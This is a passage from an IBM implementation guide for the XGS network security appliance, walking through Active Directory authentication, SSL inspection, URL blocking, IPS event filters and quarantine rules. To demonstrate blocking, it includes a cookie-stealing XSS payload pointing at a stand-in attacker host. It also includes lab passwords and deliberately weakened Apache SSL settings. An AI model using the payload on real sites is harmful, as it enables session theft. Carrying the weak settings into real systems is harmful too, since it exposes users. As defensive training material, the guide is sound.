Implementation Guide for IBM Security Network Protection
Click the Active Directory tab and enter the following values.
Security: Disable
Admin user: [email protected]
Admin password: (Windows password for the administrator)
Domain: coe.local
136
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
On the Schema tab, under Schema type, select Active Directory.
On the General tab, click the Test Connectivity button.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
137
Implementation Guide for IBM Security Network Protection
Verify that the Status of test shows Success, and then click the OK button to close the Test
Connectivity window. In the Add Directory Server window, save the configuration and deploy the
changes.
Configuring Passive Authentication
Navigate to Manage System Settings > Identity Settings > Passive Authentication.
138
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Click the New button to open the Add Tivoli Logon-event Scanner window.
For the Active Directory Server, select AD DC server and then specify the IP address where
the Logon-event Scanner is running. Enter the basic authentication User name and Password
that you specified in the Logon-event Scanner installation wizard. In this use case, the user
name is scanner and the password is Passw0rd. Save the configuration and deploy the
changes.
Configuring a Network Access Policy
Click the Secure Policy Configuration link from the main menu and then click Network Access
Policy.
In this network setup, the Active Directory server is located in the protected
network segment and XGS is configured with a Network Access rule to allow traffic
between the XGS management port and the Active Directory server. The procedure
in the following section describes on how to create a rule to allow communication
between them. In real production environment, this might not be required for your
network.
Note:
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
139
Implementation Guide for IBM Security Network Protection
Click the New button to open the Add Network Access Rule window. On the General
Configuration tab, enter 1 in the Order field, select the Enable check box, and set the Action to
Accept.
On the Response tab, add the Event Log object to Added Objects.
140
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
On the Source tab click the New button and select Host Address to create a host address
object for the IP address of the Active Directory server.
In the Add Host Address window, enter AC DC Server in the Name field and 192.168.5.128
in the Host Address field. Click Save Configuration to close the window.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
141
Implementation Guide for IBM Security Network Protection
Click the New button and select Host Address to create a host address object for the IP address
of the XGS management port.
In the Add Host Address window, enter XGS in the Name field and 192.168.5.105 in the Host
Address field. Click Save Configuration.
142
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
On the Source tab, select the new Host Address objects check boxes and then move the
objects by clicking the arrow button pointing to the right.
On the Destination tab, select the check boxes for the new Host Address objects and then
move the objects by clicking the arrow button pointing to the right.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
143
Implementation Guide for IBM Security Network Protection
On the Application tab, add Any to Added Objects.
On the Inspection tab, add the Default IPS object to Added Objects. Save the configuration and
deploy the changes.
144
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Simulating Passive Authentication
Log on to the Windows client machine (192.168.5.203) as andrew with a password of
Passw0rd.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
145
Implementation Guide for IBM Security Network Protection
On the Active Directory server, the Windows event viewer program shows the logon event with
Event ID 4624.
146
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
The logon event also includes the associated the username (andrew) and the source network
address (192.168.5.203).
In the XGS local management interface, click the Monitor Analysis and Diagnostics link from
the main menu and then click Active Sessions under Identity Settings. You see an active
session for the authenticated user.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
147
Implementation Guide for IBM Security Network Protection
Troubleshooting issues associated with the Logon-event
Scanner
To generate a new Support file, click Manage System Settings from the main menu and select
Support Files under System Settings.
Download the Support file.
148
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
In the Support file, search for the production.log in var/www/lmi/log. Look for a 4xx HTTP status
code, which could signify that the authentication process between the Logon-event Scanner and
XGS has failed, possibly due to an incorrect username or password.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
149
Implementation Guide for IBM Security Network Protection
Configuring an Outbound SSL Inspection policy
to control access to SSL-enabled websites
This use case describes how to configure the Outbound SSL Inspection policy and the Network
Access Policy with a URL List object to control outbound web access. In this example, XGS
decrypts all HTTPS access to the Twitter main website and blocks access to a specific member
site https://twitter.com/metasploit.
Before you configure the Outbound SSL Inspection, you must
assign an IP address to the protection pair.
Important:
150
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Verifying the SSL Inspection license
To determine whether the SSL Inspection License is installed, click the Manage System
Settings link from the main menu and then click Overview under the updates and licensing.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
151
Implementation Guide for IBM Security Network Protection
Configuring the Protection Interface
Click the Manage System Settings link from the main menu and then click Protection
Interfaces.
Select the check box for the protection interface and click the Edit button.
152
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
On the General Settings tab, set Protection to the Inspection Modes field and leave other
settings as default.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
153
Implementation Guide for IBM Security Network Protection
On the IPv4 Settings tab, enter the IP address information for the Address, Netmask and
Gateway fields. The IP address is used by the Outbound SSL Inspection and Network Access
Policy rule. Save the configuration and deploy the changes.
The LMI restarts. Click the link in the window to return to the LMI.
154
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Configuring an Outbound SSL Inspection policy rule
When XGS receives a request from a client, XGS tries to establish a secure connection to a
destination server as if it were the client. After XGS establishes a connection with the server, it
uses the public key that is sent from the server to generate a forged certificate in place of the real
server certificate. XGS self-signs the forged certificate (also known as the proxy certificate) with
a CA certificate generated by XGS and returns it to the client.
After XGS establishes a connection with the client by using the forged certificate, it starts
conducting a man-in-the-middle session. The traffic is decrypted, inspected, or ignored
(depending on which Outbound SSL Inspection policy rule is enabled in the Outbound SSL
Inspection policy), and then re-encrypted before it is forwarded to its destination.
Click the Secure Policy Configuration link from the main menu and select Outbound SSL
Inspection policy.
Click the New button to add a new SSL Inspection policy rule.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
155
Implementation Guide for IBM Security Network Protection
On the General Configuration tab, set the Order to 1 and set the Action to Inspect.
In this scenario, XGS inspects all SSL/TLS traffic. On the Source tab, add Any to Added
Objects.
156
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
In this scenario, XGS inspects all SSL/TLS traffic. On the Destination tab, add Any to Added
Objects.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
157
Implementation Guide for IBM Security Network Protection
In this scenario, XGS does not verify the SSL Server Certificate but does inspect all SSL/TLS
traffic. On the Domain tab, add Any to Added Objects. Save the configuration and deploy the
changes.
XGS supports Outbound SSL inspection in inline mode. IDS or
passive monitoring mode is not supported.
Important:
Man-In-The-Middle (MITM) interception can stop certain desktop
applications that validate the server certificates of internet servers. In this example,
the Adobe Flash installer program downloads installation images from their
internet servers during the installation process. When the Outbound SSL
Inspection policy replaces their server certificates with the MITM technique, the
installer stops connecting to the servers because it receives an unexpected server
certificate. Another example is that cloud-based web storage services such as
Dropbox, SkyDrive, Google Drive do not work when the Outbound SSL
Inspection policy is enabled. The Microsoft Windows Update program also does
not work when the Outbound SSL Inspection policy is enabled; computers
cannot connect to the Microsoft Update servers.
Important:
A Domain Certificate object cannot be used to create an exception
rule in the Outbound SSL Inspection policy to ignore certain SSL/TLS traffic).
XGS replaces the server certificate using the MITM technique even if the Ignore
action is specified in the rule. To create an exception rule, define network objects
such as IP addresses in the Source or Destination fields.
Important:
158
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
To create a decryption rule to ignore traffic to XGS, click the New button to add a new SSL
Inspection policy rule. On the General Configuration tab, set the Order to 1 and set the
Action to Ignore.
On the Source tab, add Any to Added Objects.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
159
Implementation Guide for IBM Security Network Protection
On the Destination tab, add XGS (192.168.5.105) to Added Objects.
In this scenario, XGS does not verify SSL Server Certificate but does inspect all SSL/TLS traffic.
On the Domain tab, add Any to Added Objects. Save the configuration and deploy the
changes.
160
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Configuring a Network Access Policy rule
To navigate to the Network Access Policy, click the Secure Policy Configuration link from the
main menu and then click Network Access Policy under the Security Policies.
Click the New button to open the Add Network Access Rule window. On the General
Configuration tab, enter 1 in the Order field. Select the Enable check box. Set the Action to
Reject.
On the Response tab, add the Event Log object to Added Objects. On the Source tab, add Any
to Added Objects, leave the others in Available Objects.
On the Destination tab, add Any to Added Objects, leave the others in Available Objects.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
161
Implementation Guide for IBM Security Network Protection
On the Application tab, Click the New button and select URL List.
Tip: The Network Protection database provides an indexed list of URL categories
that you might want to block or limit access to on your network. However, you can
also create custom lists of URLs to block or limit on your network that are not
contained in the same categories in the database. You can use these custom URL
objects to create "black list," which blocks all traffic from specific URLs. You can also
use them to create a "white list," which allows access to specific URLs, even if they
are contained in a category you have otherwise blocked.
Example: If you want to allow access to specific web mail sites, such as gmail.com
and mail.yahoo.com, but block all other web mail sites, you can create a rule to block
the category "Web mail" along with a higher-priority rule to allow those specific web
mail sites.
162
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
On the Add URL List object window, enter a name to describe the application object. This
example shows Block URL List. Then type the URLs to include in the custom URL object, such
as *twitter.com/metasploit*. Click the Save Configuration button when you are done.
Tip: Use an asterisk (*) to denote a wildcard pattern match or a question mark (?) to
denote a single wildcard character. In this example, *google.com/* captures any
contents in the google.com domain.
Add the new URL List to Added Objects.
On the Inspection tab, add the Default IPS object to Added Objects. On the Schedule tab,
leave Added Objects empty. Save the configuration and deploy the changes.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
163
Implementation Guide for IBM Security Network Protection
Downloading the CA certificate from XGS
Before you can inspect traffic that is based on rules that you configure in the Outbound SSL
Inspection policy, you must determine which signing certificates XGS uses to encrypt traffic
between the client and XGS.
Thereafter, you can download the built-in CA certificate file that is generated on XGS for
distribution to client machines.
Click the Manage System Settings link from the main menu and then select Outbound SSL
Inspection Certificates.
The built-in CA certificate file is shipped with XGS. Select the check box for the Default CA and
click Download.
164
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Copy the downloaded cert.pem file to the client machine where the user will use a web browser
to access websites.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
165
Implementation Guide for IBM Security Network Protection
Configuring the client’s Web Browser with the CA certificate
from XGS
Use the Firefox browser for this use case. On the client machine, launch the Firefox browser and
navigate to Options under Tools. Click the Advanced icon and then click the View Certificates
button on the Certificates tab.
166
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
On the Authorities tab, click the Import button
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
167
Implementation Guide for IBM Security Network Protection
Browse to the downloaded cert.pem file and click Open.
Select the Trust this CA to identify websites check box and then click OK. The browser starts
trusting any server certificates issued by the the built-in CA.
168
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Click OK to apply changes.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
169
Implementation Guide for IBM Security Network Protection
Click OK to confirm and exit.
170
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
To test the self-signed server certificate, use the browser and navigate to https://google.com
Click the lock icon to see the server certificate information. It shows that the website has been
verified by XGS. Click the More Information button to see the details of the server certificate.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
171
Implementation Guide for IBM Security Network Protection
Click the View Certficate button.
172
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
It shows that the server certificate is issued by the built-in XGS CA to www.google.com.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
173
Implementation Guide for IBM Security Network Protection
Accessing the SSL-enabled website
Launch a web browser and navigate to https://twitter.com/metasploit.
XGS intercepts the HTTPS traffic, and the Network Access Policy rule blocks access to the
URL.
To navigate to the Network Access Events, click the Monitor Analysis and Diagnostics link
from the main menu and then click Event Log. Select the Network Access Events tab. XGS
has generated an event for the associated network activity.
174
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Configuring an Outbound SSL Inspection policy
to block web-based attacks over HTTPS
This use case describes how XGS blocks web-based attacks by using the HTTPS protocol. In
this example, XGS decrypts HTTPS traffic to google and detect HTTP GET request using
HTTP_Get signature. The google web server uses a SSL server certificate issued by an
untrusted XGS CA.
This chapter also describes the procedure for configuring the server certificate verification
settings for Outbound SSL inspection on XGS.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
175
Implementation Guide for IBM Security Network Protection
Configuring SSL Inspection Settings
Click the Manage System Settings from the main menu and then click SSL Inspection
Settings under Network Settings.
The Certificate Verification Options tab provides options to block access if the server uses
unexpected server certificates.
176
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
The Trusted Certficate Authorities tab contains a list of trusted CA root certificates.
Tip: These options can help to identify network connectivity issues with the SSL
enabled server. Some SSL enabled servers might use certificates issued by an
untrusted CA. If the server certificate is invalid, XGS by default will block the SSL/TLS
connection and no record will be created in the Event Log.
The web browser on the client machine might indicate a problem with network
connection.
Accessing the Intrusion Prevention Policy
Launch a web browser to log on to the local management interface of XGS. To navigate to the
Intrusion Prevention Policy, click the Secure Policy Configuration link from the main menu and
then click Intrusion Prevention Policy under the Security Policies.
Accessing the Default IPS object
Expand the left panel. Select the Default IPS object.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
177
Implementation Guide for IBM Security Network Protection
Editing the Default IPS object
Right-click the Default IPS object and select Edit.
Setting the Trust X-Force Default
Set the X-Force Protection Level Signatures as Aggressive and select Enable X-Force
Protection Level Blocking.
178
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
To simplify the deployment of XGS in real-life environments, IBM X-Force
specifies the default signatures and recommended responses, such as Block, in each
X-Press Update (XPU).
Note:
Enabling an Event Log
Add the Event Log object to Added Objects. Save the configuration and deploy the changes.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
179
Implementation Guide for IBM Security Network Protection
Enabling the HTTP_Get audit signature in the Default IPS
object
On the Security Events tab, click the filter
button and specify a filter using the criteria
shown in the next figure. (Match: all rules, Column: Event Name, Condition: is, Value:
HTTP_Get).
Enable the HTTP_Get security event to detect all HTTP GET requests. Save the configuration
and deploy the changes.
180
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Accessing the Network Access Policy
To navigate to the Network Access Policy, click the Secure Policy Configuration link from the
main menu and then click Network Access Policy under the Security Policies.
Configuring a Network Access rule
Add/Edit a rule so that at least one rule uses the Default IPS object for inspecting network
packets for attacks. Enable the rule, set the Source to Any, set the Destination to Any, set the
Action to Accept. Save the configuration and deploy the changes.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
181
Implementation Guide for IBM Security Network Protection
Simulating an attack over HTTPS
Launch a web browser on the client machine and navigate to http://google.com.
The XGS decrypts HTTPS traffic and detects HTTP GET requests to Google using an
HTTP_Get audit signature.
182
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
To navigate to the IPS Events, click the Monitor Analysis and Diagnostics link from the main
menu and then click Event Log. Select the IPS Events tab. XGS has generated an event for the
associated attack.
You can hover the mouse over an event to see more details about the attack events.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
183
Implementation Guide for IBM Security Network Protection
Configuring the Inbound SSL Inspection policy to
decrypt inbound HTTPS traffic
This use case describes how to configure the Inbound SSL Inspection policy to decrypt SSL
traffic from external clients to internal SSL enabled servers. XGS inspects the decrypted traffic
and blocks attacks. In this example, XGS decrypts the SSL traffic to the Apache HTTP server.
If you configured an outbound SSL inspection policy and assigned
an IP address to the protection interface as shown in previous steps, clear both
settings before starting this use case.
Important:
The Inbound SSL Decryption feature does not support SSL session cache
and TLS session ticket. Diffie-Hellman key exchange protocol is also not supported
because inbound SSL inspection does not use the MITM approach to decrypt SSL
traffic. These configurations on SSL servers have to be disabled appropriately for
successful SSL decryption. In this example, modify the
/etc/apache2/mods-enabled/ssl.conf file as shown below and restart the Apache
server.
Note:
SSLCipherSuite HIGH:MEDIUM:!ADH:!DH
SSLSessionCache none
SSLSessionCacheTimeout 0
SSLProtocol SSLv3
184
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Preparing the SSL certificate and private key of target servers
In this test environment, the target web application server is an Apache HTTP server. For an
Apache HTTP server, the SSL server certificate file and its private key file path are specified in
the HTTP server configuration file (for example, httpd.conf) or the mod_ssl configuration file (for
example, ssl.conf).
In this example, the SSL server certificate is located in /etc/ssl/certs/ directory, and the private
key is located in /etc/ssl/private/.
Download the SSL certificate file and private key file to an administration PC that has access to
the LMI. In the following steps, these files are imported to XGS by using the LMI.
XGS supports certificate and key files with the PKCS#12 or PEM format. A
PKCS #12 (p12) file contains both the SSL certificate and private key and the file is
protected with a password. In the case of the PEM format, the certificate file and
private key exist as separate files. Each file is encoded with base64 and can be
copied using the text editor.
Note:
Tip: If the PEM format file is encrypted, you can use the following OpenSSL
command to decrypt and create a new PEM file.
# openssl rsa -in encrpted_key.pem -out decrypted_key.pem
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
185
Implementation Guide for IBM Security Network Protection
Configuring Inbound SSL Certificates
Log on to the LMI and navigate to Manage System Settings > Network Settings > Inbound
SSL Certificates.
Click the New button and enter the PEM data for the SSL server certificate and its private key,
which you downloaded in previous steps.
Save the configuration and deploy the changes.
186
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Configuring the Inbound SSL Inspection Policy
Click the Secure Policy Configuration link from the main menu and then click Inbound SSL
Inspection Policy under the Security Policies.
Click the New button to open the Add SSL Rule window. On the General Configuration tab,
enter 1 in the Order field. Select the Enable check box. Set the Action to Decrypt.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
187
Implementation Guide for IBM Security Network Protection
Select the Destination tab and select New > Host Address for the target HTTPS server.
Tip: You can use the List of Addresses object for adding new SSL servers during an
evaluation or a deployment project.
188
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Type the following values to specify the IP address of the target SSL server and then click Save
Configuration.
On the Destination tab, add the newly created Host Address object (web servers) to Added
Objects.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
189
Implementation Guide for IBM Security Network Protection
For the purpose of demonstration or running tests, enable both check boxes on the Alert
Condition tab to enable the results of the decryption process to be logged as System Events.
This allows you to verify the results of the decryption process when configuring the Inbound SSL
inspection policy.
You can clear the Alert On Success check box after confirming that the decryption process
completed successfully.
Save the configuration and deploy the changes.
190
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Testing Inbound SSL Inspection
Launch the web browser on the external client PC and access the SSL-enabled website hosted
in the internal network (192.168.5.111).
To navigate to the System Events, click the Monitor Analysis and Diagnostics link from the
main menu and then click Event Log. Select the System Events tab.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
191
Implementation Guide for IBM Security Network Protection
Configuring the IPS Event Filter
This use case describes how to configure the IPS Event Filter policy to tune the Threat
(Severity) Level and responses for a specific Intrusion Prevention Policy rule (security
events/signature).
IPS event filters offer you the ability to change settings for a single or for a
group of security events without having to create new Network Access policies or
Intrusion Prevention policies. The IPS Event Filter policy is similar to the Network
Access Policy in that it is a single entity that you add rules to.
Note:
Tip: IPS event filter settings always override preconfigured security event settings.
Tip: If a security event is disabled in the Intrusion Prevention Policy, its IPS event
filter is also disabled.
192
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Accessing the IPS Event Filter policy
To navigate to the IPS Event Filter policy, click the Secure Policy Configuration link from the
main menu and then click IPS Event Filter policy under the Security Policies.
Click the New button to add an IPS Event Filter rule.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
193
Implementation Guide for IBM Security Network Protection
Enter 1 in the Order field, select the Enable check box, set the Action to Block, and set the
Threat Level to High.
On the Response tab, add the Event Log object to Added Objects.
194
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
On the Intruder tab, add Any to Added Objects and leave the others in Available Objects.
On the Victim tab, add Any to Added Objects and leave the others in Available Objects.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
195
Implementation Guide for IBM Security Network Protection
On the Service tab, no setting is required.
196
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
On the Security Events tab, click the filter
button and specify a filter using the criteria
shown in the next figure (Match: all rules, Column: Available Events, Condition: contains, Value:
post_script).
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
197
Implementation Guide for IBM Security Network Protection
On the Security Events tab, add HTTP_Post_Script to Added Events. Save the configuration
and deploy the changes.
198
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Simulating a Web Application attack
Launch a browser and access the vulnerable web server hosted by IBM. Click the Feedback
link.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
199
Implementation Guide for IBM Security Network Protection
Adding a script to the feedback entry
Type the following text: <script src=”http://hackerx.org/stealcookie.js”></script>. Click
Submit.
XGS blocks the access.
200
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
XGS generates a Security Event with a different Threat Level
To navigate to the IPS Events, click the Monitor Analysis and Diagnostics link from the main
menu and then click Event Log. Select the IPS Events tab. XGS has generated an event for the
associated attack.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
201
Implementation Guide for IBM Security Network Protection
Configuring a packet-capture response to log
evidence of an attack
This use case describes how to configure the IPS Event Filter policy to include a
packet-capture response for a specific signature.
202
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Accessing the IPS Event Filter policy
To navigate to the IPS Event Filter policy, click the Secure Policy Configuration link from the
main menu and then click IPS Event Filter policy under the Security Policies.
Click the New button to add an IPS Event Filter rule.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
203
Implementation Guide for IBM Security Network Protection
On the Response tab, add the Capture Packet object to Added Objects. Save the configuration
and deploy the changes.
204
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Simulating a Web Application attack
Launch a browser and access the vulnerable web server. Click the Feedback link.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
205
Implementation Guide for IBM Security Network Protection
Adding a script to the feedback entry
Type the following text: <script src=”http://hackerx.org/stealcookie.js”></script>. Click
Submit.
XGS blocks the access.
206
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
XGS generates IPS Event and the associated packet capture
To navigate to the IPS Events, click the Monitor Analysis and Diagnostics link from the main
menu and then click Event Log. Select the IPS Events tab. XGS has generated an event for the
associated attack.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
207
Implementation Guide for IBM Security Network Protection
To navigate to Packet Captures, click Manage System Settings link from the main menu and
then click Packet Captures under the System Settings
Download the packet capture.
208
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Open the packet capture in Wireshark to analyze the contents that triggered the event.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
209
Implementation Guide for IBM Security Network Protection
Configuring a Quarantine response
This use case describes how to configure the IPS Event Filter policy with the Quarantine
object to create a quarantine rule for a specific signature. This helps to suppress persistent
threats such as blocking external attackers further upstream or to contain possible malware
infection for internal outbreaks.
210
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Creating an IPS Event Filter policy with a Quarantine object
To navigate to the IPS Event Filter policy, click the Secure Policy Configuration link from the
main menu and then click IPS Event Filter policy under the Security Policies.
Click the New button to add an IPS Event Filter rule.
Enter 1 in the Order field, select the Enable check box, set the Action to Block, and set the
Threat Level to High.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
211
Implementation Guide for IBM Security Network Protection
On the Response tab, click New > Quarantine to create a new Quarantine object.
212
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Type the following values and select the Intruder Address and Intruder Port check boxes.
Five types of quarantine are available in XGS, but you can use only the
Intrusion quarantine type with the IPS Event Filter rule and IPS Object. Other types
of quarantine are used as responses for the Advanced Threat Policy.
Note:
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
213
Implementation Guide for IBM Security Network Protection
On the Response tab, add the Event Log object and test Quarantine objects to Added Objects.
On the Security Events tab, add HTTP_POST_Script event to Added Events.
214
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Save the configuration and deploy the changes.
For the Service Object tab, you can define a service object to filter IPS
Events based on protocols such as TCP, UDP, ICMP, ICMPv6 and service port
numbers of Victim and Intruder.
Note:
Simulating a web application attack
Launch a browser and send access the vulnerable parameter web server hosted by IBM. Click
the Feedback link.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
215
Implementation Guide for IBM Security Network Protection
Type the following text: <script>alert(1)</script> as Email Address. Click Submit.
XGS blocks the attack and the web browser displays a timeout error. XGS also creates a
quarantine rule to block the source IP address and the source port.
216
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Verifying the IPS Event Filter response and quarantine rule
To navigate to the IPS Events, click the Monitor Analysis and Diagnostics link from the main
menu and then click Event Log. Select the IPS Events tab. XGS has generated an
HTTP_Post_Script event with a High severity level, as configured in the IPS Event Filter.
Select the System Events tab and verify the system event that was triggered due to the creation
